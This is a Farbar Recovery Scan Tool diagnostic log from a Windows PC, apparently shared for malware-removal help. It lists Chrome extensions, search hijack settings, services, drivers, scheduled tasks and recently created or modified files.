FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
FF Extension: Free Download Manager plugin - C:\ProgramData\Free Download Manager\Firefox\Extensions\1.6.0.7 [2014-05-13]
 
Chrome: 
=======
CHR HomePage: https://mysearch.avg.com?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=hp
CHR StartupUrls: "https://mysearch.avg.com?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=hp"
CHR DefaultSearchKeyword: mysearch.avg.com
CHR DefaultSearchURL: https://mysearch.avg.com/search?cid={A268649E-F1D3-473A-AE97-6729BD526C4B}&mid=47df76ff41b147d1a1eebd2b2b200a65-d3ca194806898021664af9d7b88cd3bb6abd1c35&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2014-08-01 17:57:47&v=3.1.0.6&pid=wtu&sg=&sap=dsp&q={searchTerms}
CHR Extension: (Google Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-08]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-01-04]
CHR Extension: (JSON Formatter) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcjindcccaagfpapjjmafapmmgkkhgoa [2014-03-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-04]
CHR Extension: (JSONView) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\chklaanhfefbnpoihckbnefhakgolnmc [2014-03-11]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-01-04]
CHR Extension: (Web Developer Checklist) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\iahamcpedabephpcgkeikbclmaljebjp [2014-03-11]
CHR Extension: (Page Ruler) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlpkojjdgbllmedoapgfodplfhcbnbpn [2014-02-14]
CHR Extension: (Skype Click to Call) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-10-08]
CHR Extension: (AVG Web TuneUp) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2014-08-01]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-04]
CHR Extension: (RSS Feed Reader) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp [2014-07-04]
CHR HKLM\...\Chrome\Extension: [amjjmamomegdbncpbjpdnhgjmgkcbgnk] - C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ch\RichMediaViewV1release335.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [bdmfpinehligogbigdemhilfkfpkccfm] - C:\Program Files\MediaViewV1\MediaViewV1alpha678\ch\MediaViewV1alpha678.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [bmbbghopkonbdcikinngeajoadgjbnek] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ch\WebexpEnhancedV1alpha26.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [empgnenkbgnjnappgnfbajalmniplfjp] - C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ch\MediaWatchV1home1288.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [ghbojfndgbbkbhfnadfapnbdfcifhhac] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ch\VideoPlayerV3beta10835.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [kbanbanalocifhgjcppngcdgminjckhm] - C:\Program Files\AmiExt\ZipEnhancer\ch\ZipEnhancer.crx [2014-07-04]
CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
CHR HKLM\...\Chrome\Extension: [lnaijfakkpgehldbggdgddehlbaabegk] - C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ch\MediaBuzzV1mode6898.crx [2014-07-14]
CHR HKLM\...\Chrome\Extension: [mjdepfkicdcciagbigfcmdhknnoaaegf] - C:\Program Files\WordWeb\wcxChrome.crx [2013-10-09]
CHR HKLM\...\Chrome\Extension: [pacgpkgadgmibnhpdidcnfafllnmeomc] - C:\Users\User\AppData\Local\Temp\ccex.crx [2013-10-09]
CHR HKLM\...\Chrome\Extension: [phcbpehkodokopeahopmbnclocbkedfd] - C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ch\MediaViewerV1alpha442.crx [2013-10-09]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3241488 2014-06-27] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-06-17] (AVG Technologies CZ, s.r.o.)
R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
S4 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2014-07-31] (Macrovision Europe Ltd.) [File not signed]
R2 ftpsvc; C:\Windows\system32\inetsrv\ftpsvc.dll [308224 2009-07-14] (Microsoft Corporation)
S3 fussvc; C:\Program Files\Windows Kits\8.0\App Certification Kit\fussvc.exe [133632 2014-07-31] (Microsoft Corporation) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [13824 2009-07-14] (Microsoft Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 MongoDB; D:\wamp\bin\mongodb\mongodb-win32-i386-2.4.5\bin\mongod.exe [11314688 2014-07-31] () [File not signed]
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [31256 2008-07-10] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [40999448 2008-07-10] (Microsoft Corporation)
S4 NetMsmqActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetPipeActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetTcpActivator; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S4 NetTcpPortSharing; C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe [139680 2012-07-09] (Microsoft Corporation) [File not signed]
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [369688 2008-07-10] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [94208 2014-07-31] (Microsoft Corporation) [File not signed]
R2 VisualSVNServer; C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe [24208 2014-06-10] (Apache Software Foundation)
S3 vrepocfgsvc; C:\Program Files\VisualSVN Server\bin\vrepocfgsvc.exe [122000 2014-06-10] (VisualSVN Ltd.)
R2 vToolbarUpdater3.1.0; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe [1814040 2014-08-01] (AVG Secure Search)
R2 wampapache; D:\wamp\bin\apache\apache2.2.17\bin\httpd.exe [20549 2010-12-31] (Apache Software Foundation) [File not signed]
R2 wampmysqld; D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe [8133120 2010-12-31] () [File not signed]
R2 postgresql-9.2; C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N "postgresql-9.2" -D "C:/Program Files/PostgreSQL/9.2/data" -w [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 ASPI32; C:\Windows\system32\Drivers\ASPI32.sys [16877 2002-07-17] (Adaptec) [File not signed]
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [199960 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-01] (AVG Technologies)
S4 RsFx0102; C:\Windows\System32\DRIVERS\RsFx0102.sys [242712 2008-07-10] (Microsoft Corporation)
S3 VSPerfDrv110; C:\Program Files\Microsoft Visual Studio 11.0\Team Tools\Performance Tools\VSPerfDrv110.sys [55416 2012-07-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-04 10:29 - 2014-08-04 13:50 - 00000000 ____D () C:\FRST
2014-08-04 10:09 - 2014-08-04 10:10 - 06004615 _____ (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.2_win32-setup.exe
2014-08-03 11:28 - 2014-08-03 11:28 - 00000000 ____D () C:\Windows\system32\%LOCALAPPDATA%
2014-08-03 11:22 - 2014-08-03 11:22 - 00000000 ____D () C:\Windows\system32\cache
2014-08-01 17:57 - 2014-08-03 11:18 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-08-01 17:57 - 2014-08-01 18:05 - 00000000 ____D () C:\Users\User\AppData\Local\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\Common Files\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:56 - 00042784 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx86.sys
2014-08-01 12:48 - 2014-08-01 12:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-08-01 11:47 - 2014-08-01 11:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-07-31 17:37 - 2014-07-31 17:37 - 00002121 _____ () C:\Users\User\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-07-31 17:37 - 2014-07-31 17:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-31 17:36 - 2014-07-31 17:36 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-07-31 16:44 - 2014-07-31 16:44 - 00001163 _____ () C:\Users\Public\Desktop\Navicat Premium.lnk
2014-07-31 13:10 - 2014-07-31 13:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\AVG2014
2014-07-31 13:06 - 2014-07-31 13:06 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\Users\User\AppData\Roaming\TuneUp Software
2014-07-31 13:06 - 2014-07-31 13:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-07-31 13:04 - 2014-07-31 13:26 - 00000000 ____D () C:\ProgramData\AVG2014
2014-07-31 13:00 - 2014-07-31 13:26 - 00000000 ____D () C:\Users\User\AppData\Local\Avg2014
2014-07-31 13:00 - 2014-07-31 13:00 - 00000000 ____D () C:\Users\User\AppData\Local\MFAData
2014-07-31 11:36 - 2014-07-31 11:36 - 00000000 ____D () C:\Qoobox
2014-07-31 11:35 - 2014-07-31 11:36 - 00000000 ___SD () C:\32788R22FWJFW
2014-07-31 11:35 - 2014-07-31 11:35 - 00000000 ____D () C:\Windows\erdnt
2014-07-30 16:01 - 2014-07-31 10:18 - 00000000 ____D () C:\AdwCleaner
2014-07-30 15:11 - 2014-07-30 15:11 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-07-30 15:06 - 2014-07-30 15:06 - 00776976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1406712158422
2014-07-30 15:06 - 2014-07-30 15:06 - 00411552 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys.1406712158422
2014-07-30 15:03 - 2014-07-31 11:38 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-07-30 14:46 - 2014-07-30 14:50 - 00004088 _____ () C:\Users\User\Desktop\Rkill.txt
2014-07-30 09:20 - 2014-07-30 09:20 - 00000687 _____ () C:\awhE80D.tmp
2014-07-29 16:50 - 2014-07-29 16:50 - 00000687 _____ () C:\awhF508.tmp
2014-07-29 13:32 - 2014-08-04 13:47 - 00026497 _____ () C:\Windows\WindowsUpdate.log
2014-07-29 12:35 - 2014-07-29 12:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2014-07-29 10:51 - 2014-07-29 10:51 - 00000687 _____ () C:\awhDFF2.tmp
2014-07-29 09:15 - 2014-07-29 09:15 - 00000687 _____ () C:\awhE5AC.tmp
2014-07-28 15:09 - 2014-07-28 15:09 - 00000687 _____ () C:\awhE446.tmp
2014-07-28 15:00 - 2014-07-28 15:00 - 00000000 ____D () C:\Windows\pss
2014-07-28 14:49 - 2014-07-28 14:49 - 00000687 _____ () C:\awhE040.tmp
2014-07-28 14:44 - 2014-07-31 11:38 - 00338870 _____ () C:\Windows\PFRO.log
2014-07-28 14:12 - 2014-07-28 14:12 - 00000687 _____ () C:\awh4D83.tmp
2014-07-28 14:07 - 2014-08-04 13:41 - 00002152 _____ () C:\Windows\setupact.log
2014-07-28 14:07 - 2014-07-28 14:07 - 00000000 _____ () C:\Windows\setuperr.log
2014-07-28 11:43 - 2014-07-28 11:43 - 00000000 ____D () C:\Users\User\Documents\iTools
2014-07-28 11:18 - 2014-07-28 11:18 - 00199672 _____ () C:\Users\User\Documents\cc_20140728_111739.reg
2014-07-28 11:11 - 2014-07-28 11:11 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-07-28 11:11 - 2014-07-28 11:11 - 00000000 ____D () C:\Program Files\CCleaner
2014-07-28 09:23 - 2014-07-28 09:23 - 00000687 _____ () C:\awhE9F0.tmp
2014-07-25 17:58 - 2014-07-25 17:58 - 00000687 _____ () C:\awhF150.tmp
2014-07-25 16:50 - 2014-08-04 13:50 - 00001460 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00002190 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001528 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001524 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001422 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001406 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001334 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job
2014-07-25 16:50 - 2014-08-04 13:42 - 00001246 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job
2014-07-25 16:49 - 2014-08-04 13:42 - 00000584 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job
2014-07-25 16:46 - 2014-07-28 10:09 - 00000000 ____D () C:\Users\User\AppData\Local\1682
2014-07-25 16:34 - 2014-08-04 13:42 - 00001426 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job
2014-07-25 16:34 - 2014-08-04 13:42 - 00001410 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job
2014-07-25 16:34 - 2014-08-04 13:42 - 00001252 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job
2014-07-25 16:34 - 2014-07-28 15:01 - 00000000 ____D () C:\Program Files\Bulk Rename Utility
2014-07-25 16:33 - 2014-08-04 13:42 - 00002002 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001528 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001524 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001460 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00001316 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job
2014-07-25 16:33 - 2014-08-04 13:42 - 00000588 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job
2014-07-25 14:44 - 2014-07-25 14:46 - 05981830 ____N (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.1_win32-setup.exe
2014-07-25 09:16 - 2014-07-25 09:16 - 00000687 _____ () C:\awhE954.tmp
2014-07-24 11:25 - 2014-08-01 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VisualSVN
2014-07-24 11:25 - 2014-08-01 13:40 - 00000000 ____D () C:\Program Files\VisualSVN Server
2014-07-24 09:13 - 2014-07-24 09:13 - 00000687 _____ () C:\awhDC4A.tmp
2014-07-23 09:25 - 2014-07-23 09:25 - 00000687 _____ () C:\awhDDEF.tmp
2014-07-22 18:23 - 2014-07-22 18:23 - 00000000 ____D () C:\Users\User\Documents\Toad Data Modeler
2014-07-22 15:53 - 2014-07-22 18:54 - 00000000 ____D () C:\Users\User\AppData\Roaming\DBDesigner4
2014-07-22 15:22 - 2014-07-22 15:22 - 00000687 _____ () C:\awhE1D6.tmp
2014-07-22 09:24 - 2014-07-22 09:24 - 00000687 _____ () C:\awhE465.tmp
2014-07-21 09:21 - 2014-07-21 09:21 - 00000687 _____ () C:\awhDBEC.tmp
2014-07-18 09:16 - 2014-07-18 09:16 - 00000687 _____ () C:\awhDCA8.tmp
2014-07-16 09:17 - 2014-07-16 09:17 - 00000687 _____ () C:\awhD8A2.tmp
2014-07-15 09:16 - 2014-07-15 09:16 - 00000687 _____ () C:\awhD9F9.tmp
2014-07-14 09:26 - 2014-07-14 09:26 - 00000687 _____ () C:\awhD9CA.tmp
2014-07-11 18:22 - 2014-08-01 11:57 - 00000000 ____D () C:\Users\User\Desktop\maintainance
2014-07-11 09:08 - 2014-07-11 09:08 - 00000687 _____ () C:\awhDCF6.tmp
2014-07-10 11:51 - 2014-07-10 11:51 - 00000804 _____ () C:\Users\User\out.sql
2014-07-10 10:09 - 2014-07-10 10:09 - 00000687 _____ () C:\awhDA18.tmp
2014-07-10 09:15 - 2014-07-10 09:15 - 00000687 _____ () C:\awhDC88.tmp
2014-07-09 09:14 - 2014-07-09 09:14 - 00000687 _____ () C:\awhDCD6.tmp
2014-07-08 09:22 - 2014-07-08 09:22 - 00000687 _____ () C:\awhE0EC.tmp
2014-07-07 09:25 - 2014-07-07 09:25 - 00000687 _____ () C:\awhD74B.tmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-04 13:50 - 2014-08-04 10:29 - 00000000 ____D () C:\FRST
2014-08-04 13:50 - 2014-07-25 16:50 - 00001460 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job
2014-08-04 13:47 - 2014-07-29 13:32 - 00026497 _____ () C:\Windows\WindowsUpdate.log
2014-08-04 13:46 - 2011-06-10 22:46 - 00000000 ____D () C:\Users\User\AppData\Roaming\Skype
2014-08-04 13:44 - 2012-01-10 15:00 - 00000000 ____D () C:\Users\User\AppData\Roaming\Dropbox
2014-08-04 13:44 - 2009-07-14 08:22 - 00000000 ____D () C:\Windows\system32\inetsrv
2014-08-04 13:43 - 2011-11-17 13:58 - 00000000 ____D () C:\Users\User\AppData\Local\TSVNCache
2014-08-04 13:42 - 2014-07-25 16:50 - 00002190 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001528 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001524 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001422 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001406 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001334 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job
2014-08-04 13:42 - 2014-07-25 16:50 - 00001246 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job
2014-08-04 13:42 - 2014-07-25 16:49 - 00000584 _____ () C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001426 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001410 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job
2014-08-04 13:42 - 2014-07-25 16:34 - 00001252 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00002002 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001528 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001524 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001460 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00001316 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job
2014-08-04 13:42 - 2014-07-25 16:33 - 00000588 _____ () C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job
2014-08-04 13:42 - 2013-10-08 10:27 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-04 13:42 - 2013-06-20 11:49 - 00000492 _____ () C:\Windows\Tasks\SDMsgUpdate (SD).job
2014-08-04 13:41 - 2014-07-28 14:07 - 00002152 _____ () C:\Windows\setupact.log
2014-08-04 13:41 - 2009-07-14 10:38 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-04 13:34 - 2012-04-08 09:26 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-08-04 13:05 - 2013-10-08 10:27 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-04 11:34 - 2011-06-18 04:35 - 00000000 ____D () C:\Users\User\AppData\Roaming\Notepad++
2014-08-04 11:17 - 2013-12-18 14:54 - 00000000 ____D () C:\Program Files\Sublime Text 3
2014-08-04 11:17 - 2013-11-21 01:16 - 00001043 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sublime Text 3.lnk
2014-08-04 10:50 - 2012-02-06 11:36 - 00000000 ____D () C:\Users\User\AppData\Roaming\FileZilla
2014-08-04 10:11 - 2012-02-06 11:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2014-08-04 10:11 - 2012-02-06 11:36 - 00000000 ____D () C:\Program Files\FileZilla FTP Client
2014-08-04 10:10 - 2014-08-04 10:09 - 06004615 _____ (Tim Kosse) C:\Users\User\Downloads\FileZilla_3.9.0.2_win32-setup.exe
2014-08-04 09:37 - 2012-02-05 10:20 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-03 11:28 - 2014-08-03 11:28 - 00000000 ____D () C:\Windows\system32\%LOCALAPPDATA%
2014-08-03 11:22 - 2014-08-03 11:22 - 00000000 ____D () C:\Windows\system32\cache
2014-08-03 11:21 - 2009-07-14 10:31 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-03 11:18 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-08-01 18:05 - 2014-08-01 17:57 - 00000000 ____D () C:\Users\User\AppData\Local\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\Common Files\AVG Secure Search
2014-08-01 17:57 - 2014-08-01 17:57 - 00000000 ____D () C:\Program Files\AVG Web TuneUp
2014-08-01 17:56 - 2014-08-01 17:57 - 00042784 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx86.sys
2014-08-01 14:42 - 2014-06-25 11:23 - 00000000 ____D () C:\Users\User\mypythonstuff
2014-08-01 13:40 - 2014-07-24 11:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VisualSVN
2014-08-01 13:40 - 2014-07-24 11:25 - 00000000 ____D () C:\Program Files\VisualSVN Server
